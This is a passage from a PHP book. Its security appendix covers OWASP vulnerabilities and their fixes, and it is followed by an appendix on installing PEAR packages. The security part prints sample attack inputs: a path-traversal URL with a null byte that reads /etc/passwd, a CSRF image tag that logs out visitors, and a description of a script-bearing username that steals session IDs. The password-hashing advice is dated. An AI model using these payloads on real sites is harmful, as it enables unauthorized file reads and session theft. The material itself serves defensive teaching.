Cross-site scripting attacks are the result of sending unchecked, user-supplied data to a browser. The problem with user-supplied data is that it’s completely outside of your control, and it’s easy to fake values like the HTTP referrer and the values in a hidden form field.

[1] http://www.owasp.org/
[2] http://www.owasp.org/index.php/Top_10_2004
[3] http://phpsecurity.org/
[4] http://www.phparch.com/pgps/
When dealing with forms, for example, validate the data carefully, and use a “deny all, permit a little” policy. For example, if a registration form has a field for the user’s username, allow only alphabetical characters and perhaps the numbers 0–9, rather than simply rejecting particular special characters. Use regular expressions to limit the data to exactly that which you require. Packages like PEAR::HTML_QuickForm, which we saw in “How do I build HTML forms with PHP?” in Chapter 5, provide built-in mechanisms for validating forms, and do a lot to help cover weaknesses you might otherwise neglect.

Without these checks, it might be possible for a malicious user to create an account with a username like this:

    John Doe<script type="text/javascript">…</script>

This username includes JavaScript that connects to another server and sends the current user’s session ID. Any person who then sees this username in the web browser (when browsing a forum, for example) will be sending his or her session ID to the remote server, allowing “John Doe” to connect to the web site as them. Of course, this tactic isn’t limited to user names; the same trick could be employed to exploit blog comment areas, the content of a forum post, or even the filename of an uploaded image.

Less serious, but equally embarrassing, is when malicious users simply post HTML that “scrambles” the layout of your page, perhaps closing a table tag prematurely. Employ a separate markup language such as BBCode where possible,[5] and eliminate or escape HTML with PHP functions like strip_tags and htmlspecialchars (see Chapter 3 for more on this). If you really want to allow HTML to be posted to your application, consider building a filter based on PEAR::XML_HTMLSax.[6]
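The two defences just described, a strict whitelist on input and escaping on output, can be sketched as follows. This is an illustration rather than a complete validation layer: the function names are hypothetical, and the rule of 3 to 20 letters or digits is an assumed policy, not one the text prescribes.

```php
<?php
/**
 * "Deny all, permit a little": accept only usernames made of
 * 3 to 20 ASCII letters or digits (an assumed policy for this sketch).
 */
function isValidUsername($username)
{
    // The D modifier stops "$" from matching before a trailing newline
    return is_string($username)
        && preg_match('/^[A-Za-z0-9]{3,20}$/D', $username) === 1;
}

/**
 * Escape a value for display inside HTML, so that any markup it
 * contains is shown as text instead of being interpreted.
 */
function escapeForHtml($text)
{
    return htmlspecialchars($text, ENT_QUOTES, 'UTF-8');
}
```

Validation rejects the malicious username at registration, and escaping ensures that anything that slips through, or that predates the validation rule, is still rendered harmlessly.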
[5] http://www.phpbb.com/community/faq.php?mode=bbcode
[6] http://pear.php.net/package/XML_HTMLSax/

Also, where items like include files are concerned, watch out for logic like this:

    include($_GET['page']);

Make sure you check the value of $_GET['page'] against a list of files you intend to include in your code:
    $pages = array('news.php', 'downloads.php', 'links.php');
    // Only include files that appear on the list of known pages
    if (isset($_GET['page']) && in_array($_GET['page'], $pages, true)) {
        include $_GET['page'];
    } else {
        include 'not_found.php';
    }

Without such checks, it’s very easy for an attacker to use code similar to this to execute other PHP scripts, even scripts you didn’t write and that aren’t stored on your server.

Injection Flaws
Another example of the problems associated with the use of unchecked user-supplied data values in a script, injection flaws allow an attacker to influence the way PHP interacts with an external system, such as the file system or a database. An SQL injection attack occurs when an attacker uses a form or URL to modify a database query, and the topic was discussed in some detail in “How do I protect my web site from an SQL injection attack?” in Chapter 2. The bottom line is: escape all the data you receive from a user before you use it in a query.

Malicious File Execution
Any script that allows the execution of a file that doesn’t reside on the server will enable an attacker to execute arbitrary code on your server. The consequences of such an attack could involve the undetected extraction of data from your application, or a total compromise of your server. Malicious file execution attacks are applicable to any system that takes filenames, in part or in whole, or files from the user, and this issue ties in closely with that of cross-site scripting attacks.

Insecure Direct Object Reference
You’ve seen URLs such as this before:
    http://site.com/view_order/?orderid=123

Perhaps you’ve tried changing the value of orderid. This is one example of a direct object reference attack; most are easy to prevent, however. For example, to make sure that a user can only see his or her own orders on your site, you might use SQL like the following to confirm that the order stored in the database has the same user_id as the current user’s user_id session value:

    // The table is called orders here because ORDER is a reserved word in SQL
    $sql = 'SELECT * FROM orders WHERE order_id=' . intval( $_GET['orderid'] ) .
        ' AND user_id=' . intval( $_SESSION['user']->get('user_id') );

Another form of direct object reference attack can be made by exploiting the way files are referenced within a script. Scripts that reference files on the basis of user-submitted data could be used to reveal information stored outside the web site’s document root. For example, take this innocuous-looking URL:

    http://site.com/welcome/?lang=en

Behind the scenes, this URL tells a page to display in English by including the en.lang.php script:

    include( $_GET['lang'] . '.lang.php' );

What do you imagine the following request would return from the above script?

    http://site.com/welcome/?lang=../../../../../../../etc/passwd%00

The ../s will push the request to the root of the file system, and the %00 on the end of that URL uses the null termination trick, which will exploit the insecure include in the PHP script to include the /etc/passwd file, the list of all system users on the server. PHP strings themselves can contain null bytes, but the underlying C functions that open the file treat a null byte as the end of the string, so the '.lang.php' appended to the end is ignored. (PHP 5.3.4 and later reject file paths that contain null bytes, but the ../ traversal itself remains a risk.)

Remember that user-submitted information is not limited to the URL and form parameters! You should check to ensure that unchecked cookie values, and HTTP request header and content values, aren’t used in your script, either.
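The lang example above can be made safe with the same whitelist idea used earlier for $_GET['page']. The following sketch assumes a fixed list of supported languages; languageFile and its parameters are hypothetical names introduced for illustration.

```php
<?php
/**
 * Map a user-supplied language code to a file name, falling back to a
 * default when the code is not on the list of supported languages.
 * Because only listed values are ever used, "../" sequences and null
 * bytes in the request can never reach include.
 */
function languageFile($requested, array $allowed, $default = 'en')
{
    // Strict comparison also rejects arrays sent as ?lang[]=...
    $lang = in_array($requested, $allowed, true) ? $requested : $default;
    return $lang . '.lang.php';
}
```

A page would then call something like `include languageFile(isset($_GET['lang']) ? $_GET['lang'] : 'en', array('en', 'de', 'fr'));` instead of concatenating the raw request value.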
Cross-site Request Forgery (CSRF)
This type of attack forces victims to perform actions on another site without their consent. As an example, such an attack might include an image in a forum message using this code:

    <img src="http://www.google.com/accounts/ClearSID" />

This code would automatically log out of Google all forum visitors who visit the page on which this code appears. More devastatingly, a CSRF attack could result in your account details being altered, or even bank transfers being initiated, without your consent.

Protection against this type of attack is actually easier for the site that’s being attacked than for the site that’s unknowingly hosting the attack. To protect against the automatic submission of forms, you could create a random token that’s regenerated for every form view, and placed in a session variable and a hidden field in the form:

    <?php
    $_SESSION['token'] = md5( uniqid( rand(), true ) );
    ?>
    <form action="sensitive_action.php" method="post">
      <input type="hidden" name="token"
          value="<?php echo $_SESSION['token'] ?>"/>
      ⋮ …rest of the form
    </form>

When the form is submitted, a script checks that the token matches the value in the session variable, which will only be the case if the form is loaded from the real site; the page fails if the request comes from elsewhere.

Another option, especially for high-risk operations such as bank transfers and password changes, is to require the user to confirm changes. This way, a forged request will cause the real user to be prompted to confirm the action before it goes ahead.

Information Leakage and Improper Error Handling
When errors occur in scripts, information that can be useful to attackers might be leaked in error messages. Take, for example, a message such as this:
    Warning: mysql_connect(): Access denied for user 'sitepoint'@'db.sitepoint.com' (using password: YES) in /var/www/index.php on line 12

This information gives a potential attacker a database host name, the database user name, and the location of the script on the server’s file system.

Similarly, error messages that output erroneous SQL statements give attackers a small view into your database structure, possibly their first step towards SQL injections. Refer to the section called “Key Security and Portability Settings” in Appendix A for information on disabling error output to the browser in production environments, and opting for error messages to be logged to a file instead.

Broken Authentication and Session Management
Broken authentication and session management vulnerabilities are closely tied to the inadequate protection of account and session data. We’ve already seen how sessions can be hijacked using cross-site scripting, and if the session is hijacked before a user logs in, the attacker simply needs to wait until the user logs in to gain full access to that person’s account.

PHP offers the session_regenerate_id function,[7] which should be used before any change in privilege level. Essentially, it maintains the session data, while changing the session ID. So after a user logs in, that person obtains a new session ID, and any previous sessions hijacked by the attacker are useless. You should also stick with PHP’s own session and cookie management functions; don’t write your own or use third-party scripts.

Other measures you can take to prevent this type of vulnerability include ensuring that your site’s logout functionality completely destroys the session data, and automatically logging users out after a period of inactivity.

It’s also advisable not to send passwords in plain text, whether in emails or displayed on screen.
If you must email a password, ensure the user has to change that password upon the next login before he or she can continue to use the site.

[7] http://www.php.net/session-regenerate-id/
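Two of the measures described in the preceding sections, the per-form token that guards against CSRF and the regeneration of the session ID at login, can be sketched together. This is a hedged illustration, not the book’s code: the function names are hypothetical, the session is passed in as an array so the logic can be exercised outside a web request, and random_bytes and hash_equals assume PHP 7 or later, which postdates the text.

```php
<?php
/** Create a fresh token, store it in the session data and return it. */
function issueFormToken(array &$session)
{
    // random_bytes() is a cryptographically secure source, unlike the
    // md5(uniqid(rand(), true)) idiom, which is easier to predict
    $session['token'] = bin2hex(random_bytes(16));
    return $session['token'];
}

/** Check a submitted token against the one stored in the session data. */
function isValidFormToken(array $session, $submitted)
{
    return isset($session['token'])
        && is_string($submitted)
        && hash_equals($session['token'], $submitted); // constant-time compare
}

/** Record a successful login, changing the session ID first. */
function logUserIn(array &$session, $userId)
{
    // Regenerate only when a session is active; true deletes the old one
    if (session_status() === PHP_SESSION_ACTIVE) {
        session_regenerate_id(true);
    }
    $session['user_id'] = $userId;
}
```

In a real page you would pass $_SESSION to these functions, echo the result of issueFormToken($_SESSION) into the hidden field, and call isValidFormToken($_SESSION, $_POST['token']) (after checking the field exists) before acting on the request.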
Insecure Cryptographic Storage
First of all, when it comes to cryptography, don’t roll your own code. Second, remember that if you’re encrypting data using an algorithm that’s meant to be decoded, then someone else will also be capable of decoding it. Remember that, strictly speaking, MD5 and SHA are not encryption algorithms (that is, you can’t decrypt an MD5 string to obtain the original data); they are message digest algorithms. If you don’t need to decrypt a value, use SHA-256, which is available through the hash function[8] in PHP 5.1.2 and later (usage: hash('sha256', $password);). If this is not an option, you can opt for the less secure MD5 hash, which is available through the md5 function.[9] This technique allows you to compare the hashed versions of two pieces of data (e.g. a stored password and that entered by a user), which avoids the risks involved in working with encrypted values that could possibly be decrypted by an attacker.

Insecure Communications
Sending any type of sensitive information in plain text isn’t just bad practice, it’s inexcusable. For example, if you’re asking a user to log in or provide credit card details, you should be securing the communications using SSL. If your application causes your server to talk to another server, for example a bank’s merchant services system, that communication should also be secured using SSL.

Failure to Restrict URL Access
Most applications will limit the links available to users on the basis of their privilege levels. For example, all users see a link to the homepage, but only administrators have access to the link to the list of users. However, many applications’ user authorization systems stop at that point, which means that anyone who types in the full URL to the user list page will gain access. Make sure that your users only see the links they can use, but also make sure that each page checks users’ privileges before allowing them to continue.
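A per-page privilege check of the kind just described might look like the sketch below. It assumes the user’s privileges are available as a simple list of names; canAccess, requirePrivilege, and the privilege name 'admin' are hypothetical and stand in for whatever permission system your application uses (Chapter 10 covers one).

```php
<?php
/** Decide whether a list of privilege names includes the one required. */
function canAccess(array $userPrivileges, $requiredPrivilege)
{
    return in_array($requiredPrivilege, $userPrivileges, true);
}

/**
 * Stop the request with a 403 response unless the privilege is held.
 * Call this at the top of every restricted page, not only when
 * deciding which links to display.
 */
function requirePrivilege(array $userPrivileges, $requiredPrivilege)
{
    if (!canAccess($userPrivileges, $requiredPrivilege)) {
        header('HTTP/1.1 403 Forbidden');
        exit('Access denied');
    }
}
```

The user list page would begin with a call such as `requirePrivilege($currentUserPrivileges, 'admin');`, so typing the URL directly gains nothing.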
[8] http://www.php.net/hash/
[9] http://www.php.net/md5/
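As a brief illustration of the digest advice in “Insecure Cryptographic Storage” above, the sketch below shows the hash('sha256', ...) call from the text next to PHP’s dedicated password functions. Note the assumption: password_hash and password_verify require PHP 5.5 or later, which postdates the text, and the wrapper function names are hypothetical.

```php
<?php
/** Compute the SHA-256 message digest of a value, as the text suggests. */
function sha256Digest($value)
{
    return hash('sha256', $value);
}

/**
 * Hash a password for storage. password_hash() adds a random salt and
 * uses a deliberately slow algorithm, which a bare digest does not.
 */
function hashPasswordForStorage($plain)
{
    return password_hash($plain, PASSWORD_DEFAULT);
}

/** Compare a submitted password with a stored hash. */
function passwordMatches($plain, $storedHash)
{
    return password_verify($plain, $storedHash);
}
```

Either way, the application stores and compares only hashed values, so there is no encrypted password for an attacker to decrypt.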
More information on this topic is available at PHP Advisory,[10] although, sadly, the site is no longer being maintained.

[10] http://www.phpadvisory.com/
Appendix D: Working with PEAR

PEAR,[1] the PHP Extension and Application Repository, is the brainchild of Stig Bakken, and was inspired by Perl’s CPAN.[2] As a project, it was originally conceived in 1999 and reached its first stable release in January 2003. PEAR serves two purposes. First, it provides a library of PHP classes for solving common architectural problems, a number of which you’ve seen in this book. Second, under the title PECL (PHP Extension Code Library), PEAR provides a repository for extensions to PHP. PECL was originally intended to store nonstandard extensions that lay more on the fringes of PHP, but it has since evolved into the default repository for all the extensions that aren’t included in the core PHP distribution. Here, I’ll be concentrating on the PHP classes that PEAR provides.

Those who submit work and maintain the PEAR repository are all volunteers. Originally a small community of developers, the number of volunteers has grown significantly since the release of the first stable version of PEAR, and the group receives a greater focus from the PHP community as a whole. There’s still a lot of work to be done to raise the standards of PECL to that of PHP itself, documentation being a key area in which there’s still much room for improvement. If you’re struggling with a PEAR package, a good place to start is PHPKitchen’s list of PEAR Tutorials.[3] That said, PEAR already offers significant value in terms of reducing the effort required in developing PHP applications.

But what does PEAR actually mean to you? Browse the list of packages,[4] and you’ll see that PEAR provides many classes, categorized by subject, to help you avoid having to reinvent wheels. It’s important to understand that the focus of PEAR classes is architectural issues, not application-level classes. In other words, you won’t find complete applications there; rather, you’ll find code that can be reused in many different applications.
Also important is that the PEAR developer community does its best to maintain and support the library, which compares favorably with, say, the projects available via SourceForge,[5] which are often individual endeavours and come to a sudden end once the individuals in question stop contributing their time.

[1] http://pear.php.net/
[2] http://www.cpan.org/
[3] http://www.phpkitchen.com/index.php?/archives/668-PEAR-Tutorials.html
[4] http://pear.php.net/packages.php
[5] http://sourceforge.net/

Otherwise, there is some emphasis on maintaining a degree of standardization throughout the PEAR library. For example, all error handling should be performed using PEAR::Error, and the code should be documented using the PHPDoc standard, which means that if you can’t find the API documentation on the PEAR web site, you should be able to extract it using phpDocumentor,[6] which we covered in some detail in “How can I document my code for later reference by myself or others?” in Chapter 13.

Be warned: the degree of integration between the packages within PEAR is currently fairly low when compared to, say, the Java class library. This means that, in some cases, you’ll be confronted with decisions such as whether to use PEAR::HTML_QuickForm’s validation functionality, or PEAR::Validate, or both. It’s a good idea to invest some time up front investigating which option fits your development style, rather than jumping straight in and using a PEAR class for a critical part of your application, only to discover later that it wasn’t the best solution to the problem.

One important point to be clear on is that a reference to PEAR can actually mean one of two things: the repository as a whole, or the PEAR front end (also known as the package manager), which provides tools for installing and upgrading the PEAR packages you use.

You’re not required to use the PEAR package manager to install PEAR packages. If you need to, you can download them directly from the PEAR web site and manually extract them to your PHP’s include path.
Make sure you check the dependencies listed on the site (these are other required packages) and be aware that most packages implicitly require the PEAR base package for tasks like error handling.[7]

[6] http://www.phpdoc.org/
[7] http://pear.php.net/package/PEAR/

Installing PEAR
These days, the foundations of PEAR are provided with the PHP distribution itself, but web hosts typically fail to provide customers with their own default PEAR installations, so it’s worth knowing how to go about installing PEAR from scratch. The process can differ slightly between Unix- and Windows-based systems.
Step one is to make sure you can run PHP scripts via the command line. This is always possible if you type the full path to the PHP binary. For a Unix-based system, you’d use the following:

    /usr/local/bin/php /home/username/scripts/my_script.php

For Windows, you’d use something like this:

    c:\php\cli\php.exe c:\scripts\my_script.php

Note that in the Windows path above, we used the executable in the c:\php\cli (command line interface) subdirectory of the PHP installation. This executable behaves slightly differently from that used by Apache to handle web pages. PHP binary releases for Windows since version 4.3.0 place the CLI version of the PHP executable in this directory.

We can make PHP much easier to use from the command line by applying some changes to the system’s environment variables. For more information, see the PHP CLI manual pages.[8]

Next, point your browser at http://go-pear.org/, where you’ll see a PHP script. This script is used to install the PEAR package manager, the basis you’ll need in order to install other PEAR packages. Download this to your computer and save it as go-pear.php.

From this point, you have a number of options. Storing go-pear.php somewhere under your web server’s document root directory will allow you to run the script as a web page. This behavior is still experimental, though, so there are no guarantees it’ll work correctly. If you do use this approach, make sure that the script is not publicly available!

A better option is to execute the go-pear.php script via the command line:

    /usr/local/bin/php /home/username/pear/go-pear.php

Here’s the command for Windows users:

    c:\php\cli\php c:\pear\go-pear.php

[8] http://www.php.net/features.commandline/
This command will launch an interactive command line interface, which will ask you questions about how you would like PEAR installed. Note that the installation prefix is the directory in which PEAR (as well as any packages you install later) will be installed, and is referred to as $prefix; $php_dir contains the path to your PHP installation (in which go-pear.php will put PEAR-related documentation by default, unless you specify otherwise). Windows users should be aware that changing the installation prefix will cause a Windows Browse dialog to display; you can use it to specify the directory you require.

With the installation options set to your requirements, the go-pear.php script will connect to the PEAR web site and download all the packages required to set up the package manager (it also asks if you require additional packages, which are well worth having). Packages are installed in a subdirectory, called pear, that’s within the directory you specified as the installation prefix. So, in the above examples, you’d end up with c:\pear\pear or /home/username/pear/pear.

If you let it, the go-pear.php installer will attempt to modify your include_path in php.ini. To do this manually, assuming you used the directories above, you’d specify the following:

    include_path = ".:/home/username/pear/pear"

For Windows users, the path is as follows:

    include_path = ".;c:\pear\pear"

To use the PEAR package manager from the command line, you’ll also need to set up some environment variables. Windows users can automatically add these variables to their Windows registries by right-clicking on the file PEAR_ENV.reg and choosing Run from the menu that appears. The variables may also be manually configured as environment variables via the Windows Control Panel. Users of Unix-based systems can configure the variables to be set up every time they log in.
To do so, they must edit the file .profile in the home directory (/home/username):

    # Environment variables
    export PHP_PEAR_SYSCONF_DIR=/home/username/pear
    export PHP_PEAR_INSTALL_DIR=/home/username/pear/pear
    export PHP_PEAR_DOC_DIR=/home/username/pear/pear/docs
    export PHP_PEAR_BIN_DIR=/home/username/pear
    export PHP_PEAR_DATA_DIR=/home/username/pear/pear/data
    export PHP_PEAR_TEST_DIR=/home/username/pear/pear/tests
    export PHP_PEAR_PHP_BIN=/usr/local/bin/php

Finally, you’ll need to add the PEAR command line script to your system path, which, on Windows, can be achieved through the System Control Panel application (on the Advanced tab, click Environment Variables). Simply append ;c:\pear to the PATH variable. On Unix-based systems, add the following to the .profile script:

    export PATH=$PATH:/home/username/pear

Once you’ve done all that, you’re ready to move on and use the package manager.

The PEAR Package Manager
Assuming you’ve set up PEAR correctly, you can now use the command line interface to the PEAR package manager to install packages. For example, take this command:

    pear install HTML_Common

This line will install the package HTML_Common from the PEAR web site. The package names for the command line are the same as those on the web site.

The PEAR Package Manager uses XML_RPC to communicate with the PEAR web site. If you’re behind a proxy server or firewall, you’ll need to tell PEAR the domain name of the proxy server like so:

    pear config-set http_proxy proxy.your-isp.com

To unset the variable at some later stage, simply use this command:
    pear config-set http_proxy ""

To add HTML_QuickForm to the installed PEAR packages, you simply need to type the following:

    pear install HTML_QuickForm

Should another release of HTML_QuickForm be made after you’ve installed it, you can upgrade the version with this command:

    pear upgrade HTML_QuickForm

If, for some reason, you later decide you don’t need HTML_QuickForm any more, you can remove it using this line:

    pear uninstall HTML_QuickForm

For a list of all the PEAR commands, simply type pear.

Now, if you don’t like command lines, there’s also an (experimental) web-based front end to PEAR (there’s also a PHP-GTK front end, but it’s beyond the scope of this discussion). To use this tool, you need to install it from the command line, although if you executed go-pear.php through your web server, the web-based front end will already have been installed for you. To install the front end, type the following commands:

    pear install Net_UserAgent_Detect
    pear install Pager
    pear install HTML_Template_IT
    pear install PEAR_Frontend_Web

Note that the first three packages we’ve specified here are required by PEAR_Frontend_Web. Now you can launch the front end from your web server using the following simple script:
    <?php
    // Optional if include path not set
    # ini_set('include_path','c:\htdocs\PEAR');
    require_once 'PEAR.php';
    // For Windows users
    # $pear_user_config = 'c:\windows\pear.ini';
    // For Unix users
    $pear_user_config = '/home/username/pear/pear/PEAR/pear.conf';
    $useDHTML = true; // Switch off for older browsers
    require_once 'PEAR/WebInstaller.php';
    ?>

Installing Packages Manually
It’s possible to install PEAR packages manually (although this involves more work), but it’s important to watch the include paths carefully when you’re doing so. First of all, create a directory that will be the base of all the PEAR classes you install, making sure that this directory is in your include path. Next, install the main PEAR package.[9] Download the latest stable version and extract it directly to the directory you’ve created, so that PEAR.php is in the root of this directory.

Installing further packages can be completed in more or less the same fashion, but you need to be careful to choose the correct directories when you’re extracting the various files. For example, if you’re installing PEAR::DB, the main DB.php file goes alongside the PEAR.php file in the root of the PEAR class directory, while further PEAR::DB-related files belong in the subdirectory DB. The best way to check that you’ve selected the appropriate directories is to look at the package.xml file that comes with every PEAR package. There you’ll find an element called filelist, which lists all the files contained in the package and the locations at which they should be installed. For each file, check the baseinstalldir attribute: if it’s specified, it will tell you where the file should be placed relative to the root PEAR class directory. The name attribute specifies the path and filename, relative to the baseinstalldir (or just the root PEAR class directory if there’s no baseinstalldir attribute), where each file should be placed.

[9] http://pear.php.net/package/PEAR/

Alternatives to PEAR
Many repositories of reusable PHP classes are available. Some web sites, such as PHP Classes,[10] offer user-contributed work for download, while others, such as eZ Components,[11] manage their own code base of reusable classes that can be downloaded as a package. For more tightly integrated repositories of code, you might like to investigate the numerous rapid application development frameworks available, such as the Zend Framework[12] and CakePHP.[13]

It’s not within the scope of this book to cover any of these frameworks in depth, or comment on which will best suit your needs, but on the whole, reusing code from any of these sources, including PEAR, can save you development time and allow you to concentrate on writing software that solves your needs, rather than rewriting basic components for every project.

Note, however, that some overhead is involved when you’re starting out with code from repositories and frameworks. Writing all your code from scratch might be the fastest solution in the short term, but selecting and becoming fluent with one repository or framework will help decrease your development time in the medium term, and will benefit anyone that writes more than one web site. You’ll also find that selecting the right framework will make it easier for other developers to come up to speed when they’re working on the sites you create. Also, avoid switching development environments frequently, as this will reset your learning curve and might adversely affect your productivity.

Finally, remember that when you use code from any repository that accepts public contributions with little or no requirement for quality control, you might be opening yourself up to all sorts of problems, from security vulnerabilities to reliance on stale and unmaintained components.
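Whichever library you choose, PEAR or one of the alternatives, its classes have to be on PHP’s include path, as the installation steps earlier in this appendix stressed. When you can’t edit php.ini on a shared host, the path can be extended at run time instead. The sketch below assumes the /home/username/pear/pear directory used in the examples above; appendIncludeDir is a hypothetical helper name.

```php
<?php
/**
 * Return an include path with $dir appended, unless it is already one
 * of the entries. PATH_SEPARATOR is ":" on Unix and ";" on Windows.
 */
function appendIncludeDir($currentPath, $dir)
{
    $parts = $currentPath === '' ? array() : explode(PATH_SEPARATOR, $currentPath);
    if (!in_array($dir, $parts, true)) {
        $parts[] = $dir;
    }
    return implode(PATH_SEPARATOR, $parts);
}
```

A script would then call `set_include_path(appendIncludeDir(get_include_path(), '/home/username/pear/pear'));` before `require_once 'PEAR.php';`, which has the same effect as the include_path line shown for php.ini.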
10 http://www.phpclasses.org/
11 http://ez.no/ezcomponents/
12 http://framework.zend.com/
13 http://www.cakephp.org/
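To make the manual installation steps described earlier in this appendix more concrete, here's a minimal sketch of how you might work out where each file in a package belongs. It reads the file entries in a filelist element and combines each baseinstalldir and name attribute with the root PEAR class directory. The XML fragment is a simplified, hypothetical example rather than a real package.xml, the function name pearInstallPaths and the directory /home/username/pear are assumptions made for illustration, and the sketch assumes the file entries aren't nested inside dir elements.

```php
<?php
// Hypothetical, simplified package.xml fragment. A real package.xml has
// many more elements, and may nest <file> entries inside <dir> elements,
// which this sketch does not handle.
$packageXml = <<<XML
<package>
  <release>
    <filelist>
      <file role="php" baseinstalldir="/" name="DB.php"/>
      <file role="php" baseinstalldir="DB" name="common.php"/>
      <file role="php" name="PEAR.php"/>
    </filelist>
  </release>
</package>
XML;

/**
 * Returns the target path of every <file> entry in the filelist,
 * relative to the given root PEAR class directory.
 */
function pearInstallPaths($xmlString, $pearRoot)
{
    $package = simplexml_load_string($xmlString);
    $paths = array();

    foreach ($package->xpath('//filelist/file') as $file) {
        // A missing baseinstalldir attribute casts to an empty string,
        // which means "the root PEAR class directory".
        $base = trim((string) $file['baseinstalldir'], '/');
        $name = ltrim((string) $file['name'], '/');

        $relative = ($base === '') ? $name : $base . '/' . $name;
        $paths[] = rtrim($pearRoot, '/') . '/' . $relative;
    }

    return $paths;
}

// Print the location at which each file should be placed
foreach (pearInstallPaths($packageXml, '/home/username/pear') as $path) {
    echo $path, "\n";
}
?>
```

With a listing like this in hand, you can compare the printed paths against the files you've extracted before you add the directory to your include path.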